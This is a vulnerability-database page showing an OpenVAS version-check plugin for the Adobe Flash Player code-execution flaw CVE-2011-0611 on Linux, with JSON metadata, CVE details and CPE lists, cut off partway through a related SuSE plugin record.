Search...

Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)

2011-04-22T00:00:00

ID OPENVAS:801922
Type openvas
Reporter Copyright (c) 2011 Greenbone Networks GmbH
Modified 2017-02-25T00:00:00

Description

This host has Adobe flash Player installed, and is prone to code execution vulnerability.

                                        
                                            ###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_adobe_flash_player_code_execution_vuln_apr11_lin.nasl 5424 2017-02-25 16:52:36Z teissa $
#
# Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)
#
# Authors:
# Antu Sanadi &lt;santu@secpod.com&gt;
#
# Copyright:
# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

tag_impact = "Successful exploitation will let attackers to corrupt memory
and execute arbitrary code on the system with elevated privileges.

Impact Level: System/Application";

tag_affected = "Adobe Flash Player version 10.2.153.1 and prior on Linux";

tag_insight = "The flaw is due to an error in handling 'SWF' file in adobe flash
player, which allows attackers to execute arbitrary code or cause a denial
of service via crafted flash content.";

tag_solution = "Upgrade adobe flash player to version 10.2.159.1 or later,
Update Adobe Reader/Acrobat to version 9.4.4 or 10.0.3 or later,
For updates refer to http://www.adobe.com";

tag_summary = "This host has Adobe flash Player installed, and is prone to code
execution vulnerability.";

if(description)
{
  script_id(801922);
  script_version("$Revision: 5424 $");
  script_tag(name:"last_modification", value:"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $");
  script_tag(name:"creation_date", value:"2011-04-22 16:38:12 +0200 (Fri, 22 Apr 2011)");
  script_cve_id("CVE-2011-0611");
  script_bugtraq_id(47314);
  script_tag(name:"cvss_base", value:"9.3");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_name("Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)");
  script_xref(name : "URL" , value : "https://www.kb.cert.org/vuls/id/230057");
  script_xref(name : "URL" , value : "http://www.adobe.com/support/security/advisories/apsa11-02.html");
  script_xref(name : "URL" , value : "http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html");

  script_category(ACT_GATHER_INFO);
  script_copyright("Copyright (c) 2011 Greenbone Networks GmbH");
  script_family("General");
  script_dependencies("gb_adobe_flash_player_detect_lin.nasl");
  script_require_keys("AdobeFlashPlayer/Linux/Ver");
  script_tag(name : "impact" , value : tag_impact);
  script_tag(name : "affected" , value : tag_affected);
  script_tag(name : "insight" , value : tag_insight);
  script_tag(name : "solution" , value : tag_solution);
  script_tag(name : "summary" , value : tag_summary);
  script_tag(name:"qod_type", value:"executable_version");
  script_tag(name:"solution_type", value:"VendorFix");
  exit(0);
}


include("version_func.inc");

## Check for Adobe Flash Player version
flashVer = get_kb_item("AdobeFlashPlayer/Linux/Ver");
flashVer = ereg_replace(pattern:",", string:flashVer, replace: ".");
if(flashVer)
{
  if(version_is_less_equal(version:flashVer, test_version:"10.2.153.1")){
    security_message(0);
  }
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:801922", "type": "openvas", "bulletinFamily": "scanner", "title": "Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)", "description": "This host has Adobe flash Player installed, and is prone to code\nexecution vulnerability.", "published": "2011-04-22T00:00:00", "modified": "2017-02-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=801922", "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "references": ["https://www.kb.cert.org/vuls/id/230057", "http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html", "http://www.adobe.com/support/security/advisories/apsa11-02.html"], "cvelist": ["CVE-2011-0611"], "lastseen": "2017-07-02T21:13:41", "viewCount": 2, "enchantments": {"score": {"value": 9.9, "vector": "NONE", "modified": "2017-07-02T21:13:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-0611"]}, {"type": "symantec", "idList": ["SMNTC-47314"]}, {"type": "threatpost", "idList": ["THREATPOST:E1674DBE48ED411E7EF48579A10BCF26", "THREATPOST:D88693546B31883668AC9C41021BDA5B", "THREATPOST:66AAE48AA5E53AA0EB4A9179456F65FC", "THREATPOST:CA3146FC939402FCEA258087D3508FFB", "THREATPOST:684A9363491231773FDB7BA1EBA2B6C0"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASHPLAYER_FLASH10O"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231070774", "OPENVAS:136141256231069593", "OPENVAS:1361412562310801921", "OPENVAS:1361412562310850162", "OPENVAS:1361412562310801922", "OPENVAS:850162", "OPENVAS:69593", "OPENVAS:70774"]}, {"type": "saint", "idList": ["SAINT:D1E10A87E683A65C65EF800D90A66751", "SAINT:75531313EF0C522E1ADBAD17BC07C016", "SAINT:37227B38CBD904922BB3BD8CB235215F"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:100507"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_32B05547691311E0BDC4001B2134EF46.NASL", "SUSE_FLASH-PLAYER-7477.NASL", "FLASH_PLAYER_APSB11-07.NASL", "SUSE_11_3_FLASH-PLAYER-110415.NASL", "SUSE_11_FLASH-PLAYER-110415.NASL", "REDHAT-RHSA-2011-0451.NASL", "SUSE_11_4_FLASH-PLAYER-110415.NASL", "SUSE_11_2_FLASH-PLAYER-110415.NASL", "ADOBE_AIR_APSB11-07.NASL", "ADOBE_READER_APSA11-02.NASL"]}, {"type": "cert", "idList": ["VU:230057"]}, {"type": "freebsd", "idList": ["32B05547-6913-11E0-BDC4-001B2134EF46"]}, {"type": "seebug", "idList": ["SSV:20497", "SSV:71835", "SSV:20472"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:1A046239C4FEFA2569E258EE0A65227F"]}, {"type": "exploitdb", "idList": ["EDB-ID:17175"]}, {"type": "redhat", "idList": ["RHSA-2011:0451"]}, {"type": "suse", "idList": ["SUSE-SA:2011:018"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "gentoo", "idList": ["GLSA-201110-11"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}], "modified": "2017-07-02T21:13:41", "rev": 2}, "vulnersScore": 9.9}, "pluginID": "801922", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_player_code_execution_vuln_apr11_lin.nasl 5424 2017-02-25 16:52:36Z teissa $\n#\n# Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let attackers to corrupt memory\nand execute arbitrary code on the system with elevated privileges.\n\nImpact Level: System/Application\";\n\ntag_affected = \"Adobe Flash Player version 10.2.153.1 and prior on Linux\";\n\ntag_insight = \"The flaw is due to an error in handling 'SWF' file in adobe flash\nplayer, which allows attackers to execute arbitrary code or cause a denial\nof service via crafted flash content.\";\n\ntag_solution = \"Upgrade adobe flash player to version 10.2.159.1 or later,\nUpdate Adobe Reader/Acrobat to version 9.4.4 or 10.0.3 or later,\nFor updates refer to http://www.adobe.com\";\n\ntag_summary = \"This host has Adobe flash Player installed, and is prone to code\nexecution vulnerability.\";\n\nif(description)\n{\n script_id(801922);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-04-22 16:38:12 +0200 (Fri, 22 Apr 2011)\");\n script_cve_id(\"CVE-2011-0611\");\n script_bugtraq_id(47314);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe Flash Player Arbitrary Code Execution Vulnerability (Linux)\");\n script_xref(name : \"URL\" , value : \"https://www.kb.cert.org/vuls/id/230057\");\n script_xref(name : \"URL\" , value : \"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name : \"URL\" , value : \"http://blogs.adobe.com/psirt/2011/04/security-advisory-for-adobe-flash-player-adobe-reader-and-acrobat-apsa11-02.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_lin.nasl\");\n script_require_keys(\"AdobeFlashPlayer/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Check for Adobe Flash Player version\nflashVer = get_kb_item(\"AdobeFlashPlayer/Linux/Ver\");\nflashVer = ereg_replace(pattern:\",\", string:flashVer, replace: \".\");\nif(flashVer)\n{\n if(version_is_less_equal(version:flashVer, test_version:\"10.2.153.1\")){\n security_message(0);\n }\n}\n", "naslFamily": "General"}

{"cve": [{"lastseen": "2021-02-02T05:50:59", "description": "Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android; Adobe AIR before 2.6.19140; and Authplay.dll (aka AuthPlayLib.bundle) in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via crafted Flash content; as demonstrated by a Microsoft Office document with an embedded .swf file that has a size inconsistency in a \"group of included constants,\" object type confusion, ActionScript that adds custom functions to prototypes, and Date objects; and as exploited in the wild in April 2011.", "edition": 6, "cvss3": {}, "published": "2011-04-13T14:55:00", "title": "CVE-2011-0611", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-0611"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/a:adobe:flash_player:8.0.42.0", "cpe:/a:adobe:acrobat_reader:9.1.3", "cpe:/a:adobe:adobe_air:2.6", "cpe:/a:adobe:acrobat:9.1", "cpe:/a:adobe:flash_player:10.1.105.6", "cpe:/a:adobe:acrobat:9.3.2", "cpe:/a:adobe:flash_player:9.0.152.0", "cpe:/a:adobe:flash_player:10.0.42.34", "cpe:/a:adobe:acrobat:9.4.3", "cpe:/a:adobe:acrobat_reader:9.4.1", "cpe:/a:adobe:acrobat:9.3", "cpe:/a:adobe:flash_player:8.0.24.0", "cpe:/a:adobe:flash_player:9.0.31", "cpe:/a:adobe:acrobat:10.0", "cpe:/a:adobe:acrobat_reader:9.3.1", "cpe:/a:adobe:flash_player:7.0.24.0", "cpe:/a:adobe:acrobat_reader:10.0.2", "cpe:/a:adobe:acrobat_reader:9.4.2", "cpe:/a:adobe:flash_player:7.0.67.0", "cpe:/a:adobe:flash_player:10.1.92.10", "cpe:/a:adobe:acrobat:9.1.1", "cpe:/a:adobe:flash_player:10.2.152.33", "cpe:/a:adobe:flash_player:10.2.156.12", "cpe:/a:adobe:flash_player:9.0.31.0", "cpe:/a:adobe:acrobat:9.3.3", "cpe:/a:adobe:acrobat_reader:9.3.2", "cpe:/a:adobe:acrobat_reader:9.4.3", "cpe:/a:adobe:acrobat:9.0", "cpe:/a:adobe:flash_player:7.0.1", "cpe:/a:adobe:acrobat:10.0.2", "cpe:/a:adobe:acrobat:9.4.2", "cpe:/a:adobe:flash_player:10.0.45.2", "cpe:/a:adobe:flash_player:7.0.66.0", "cpe:/a:adobe:flash_player:8.0.39.0", "cpe:/a:adobe:acrobat:10.0.1", "cpe:/a:adobe:flash_player:10.2.152.32", "cpe:/a:adobe:flash_player:7.0.19.0", "cpe:/a:adobe:acrobat_reader:9.3", "cpe:/a:adobe:flash_player:9.0.112.0", "cpe:/a:adobe:adobe_air:1.1", "cpe:/a:adobe:flash_player:9.0.20", "cpe:/a:adobe:flash_player:8.0.35.0", "cpe:/a:adobe:flash_player:9.0.18d60", "cpe:/a:adobe:acrobat:9.4", "cpe:/a:adobe:adobe_air:2.0.2", "cpe:/a:adobe:flash_player:7.0.70.0", "cpe:/a:adobe:flash_player:7.1.1", "cpe:/a:adobe:flash_player:8.0.33.0", "cpe:/a:adobe:flash_player:9.0.16", "cpe:/a:adobe:acrobat:9.2", "cpe:/a:adobe:flash_player:10.0.32.18", "cpe:/a:adobe:flash_player:7.1", "cpe:/a:adobe:flash_player:9.0.124.0", "cpe:/a:adobe:acrobat:9.1.2", "cpe:/a:adobe:acrobat_reader:9.3.3", "cpe:/a:adobe:adobe_air:1.5", "cpe:/a:adobe:flash_player:10.1.53.64", "cpe:/a:adobe:flash_player:7.0.61.0", "cpe:/a:adobe:acrobat:9.1.3", "cpe:/a:adobe:flash_player:7.0.69.0", "cpe:/a:adobe:adobe_air:2.0.3", "cpe:/a:adobe:flash_player:9.0.155.0", "cpe:/a:adobe:flash_player:10.0.22.87", "cpe:/a:adobe:acrobat_reader:9.3.4", "cpe:/a:adobe:acrobat_reader:9.2", "cpe:/a:adobe:flash_player:10.1.82.76", "cpe:/a:adobe:acrobat_reader:9.4", "cpe:/a:adobe:flash_player:10.1.102.64", "cpe:/a:adobe:flash_player:9.125.0", "cpe:/a:adobe:adobe_air:1.0", "cpe:/a:adobe:acrobat_reader:10.0", "cpe:/a:adobe:flash_player:10.1.85.3", "cpe:/a:adobe:flash_player:9.0.277.0", "cpe:/a:adobe:acrobat_reader:9.0", "cpe:/a:adobe:flash_player:7.2", "cpe:/a:adobe:flash_player:10.0.12.36", "cpe:/a:adobe:adobe_air:2.0.4", "cpe:/a:adobe:flash_player:9.0.47.0", "cpe:/a:adobe:flash_player:8.0.34.0", "cpe:/a:adobe:flash_player:9.0.151.0", "cpe:/a:adobe:flash_player:9.0.48.0", "cpe:/a:adobe:flash_player:10.1.92.8", "cpe:/a:adobe:flash_player:6.0.79", "cpe:/a:adobe:flash_player:7.0.73.0", "cpe:/a:adobe:flash_player:9.0.115.0", "cpe:/a:adobe:flash_player:9.0.28.0", "cpe:/a:adobe:adobe_air:1.5.3", "cpe:/a:adobe:flash_player:10.1.52.15", "cpe:/a:adobe:acrobat_reader:9.1.1", "cpe:/a:adobe:flash_player:9.0.28", "cpe:/a:adobe:flash_player:10.2.152", "cpe:/a:adobe:flash_player:8.0.22.0", "cpe:/a:adobe:flash_player:8.0", "cpe:/a:adobe:flash_player:9.0.246.0", "cpe:/a:adobe:flash_player:10.1.106.16", "cpe:/a:adobe:flash_player:7.0.53.0", "cpe:/a:adobe:flash_player:7.0.63", "cpe:/a:adobe:acrobat_reader:9.1", "cpe:/a:adobe:flash_player:7.0.14.0", "cpe:/a:adobe:acrobat:9.4.1", "cpe:/a:adobe:acrobat_reader:9.1.2", "cpe:/a:adobe:acrobat_reader:10.0.1", "cpe:/a:adobe:flash_player:10.0.15.3", "cpe:/a:adobe:flash_player:9.0.125.0", "cpe:/a:adobe:flash_player:7.0.68.0", "cpe:/a:adobe:flash_player:9.0.20.0", "cpe:/a:adobe:flash_player:7.0.25", "cpe:/a:adobe:flash_player:9.0.114.0", "cpe:/a:adobe:flash_player:9.0.262.0", "cpe:/a:adobe:flash_player:6.0.21.0", "cpe:/a:adobe:flash_player:10.0.0.584", "cpe:/a:adobe:flash_player:9.0.283.0", "cpe:/a:adobe:flash_player:10.2.154.25", "cpe:/a:adobe:flash_player:10.0.12.10", "cpe:/a:adobe:flash_player:9.0.260.0", "cpe:/a:adobe:flash_player:7.0", "cpe:/a:adobe:flash_player:9.0.45.0", "cpe:/a:adobe:flash_player:10.1.52.14.1", "cpe:/a:adobe:acrobat:9.3.1", "cpe:/a:adobe:acrobat:9.3.4", "cpe:/a:adobe:adobe_air:1.5.2", "cpe:/a:adobe:flash_player:10.2.154.13", "cpe:/a:adobe:flash_player:10.1.95.2", "cpe:/a:adobe:flash_player:9.0", "cpe:/a:adobe:flash_player:7.0.60.0", "cpe:/a:adobe:flash_player:10.1.95.1", "cpe:/a:adobe:flash_player:9.0.159.0"], "id": "CVE-2011-0611", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0611", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:7.0.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.0.584:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.70.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.260.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.115.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.159.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.262.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.79:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.47.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.73.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.112.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.105.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.95.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.152.32:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.152.33:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.39.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.277.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.106.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.102.64:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.61.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.82.76:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.33.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.34.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.53.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.151.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.69.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.67.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.42.34:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.52.15:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.125.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.154.13:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.22.87:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.85.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:6.0.21.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.68.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.18d60:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.124.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.114.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.10:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.24.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.156.12:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.66.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.246.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:2.6:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:adobe_air:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.32.18:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.53.64:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.2.154.25:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.12.36:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.35.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.0.45.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.155.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.95.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.152.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.60.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.283.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:10.1.92.8:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.0.63:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.48.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.45.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:9.0.31.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:acrobat_reader:9.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:8.0.42.0:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2017-12-12T11:19:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-0611"], "description": "Check for the Version of flash-player", "modified": "2017-12-08T00:00:00", "published": "2011-04-22T00:00:00", "id": "OPENVAS:850162", "href": "http://plugins.openvas.org/nasl.php?oid=850162", "type": "openvas", "title": "SuSE Update for flash-player SUSE-SA:2011:018", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SuSE Update for flash-player SUSE-SA:2011:018\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General 